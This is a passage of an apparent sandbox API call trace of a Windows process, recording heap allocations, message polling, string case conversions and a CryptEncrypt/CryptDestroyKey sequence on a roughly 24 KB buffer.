(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.317] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.317] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x5fbe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x5fc0) returned 1 [0039.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.318] CharLowerBuffW (in: lpsz="byte[24513]", cchLength=0xb | out: lpsz="byte[24513]") returned 0xb [0039.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.318] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.319] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.319] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad1f70*, pdwDataLen=0x6ae220*=0x5fbe, dwBufLen=0x5fc0 | out: pbData=0xad1f70*, pdwDataLen=0x6ae220*=0x5fc0) returned 1 [0039.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.319] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.319] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.319] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.320] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.320] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.320] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.323] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.323] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.323] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.325] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.325] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.325] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.325] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.325] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.325] CryptDestroyKey (hKey=0x7c2200) returned 1 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.327] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.328] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.328] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889730 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.328] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.328] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.328] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0039.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.329] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.329] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.329] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.330] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.330] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.330] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: 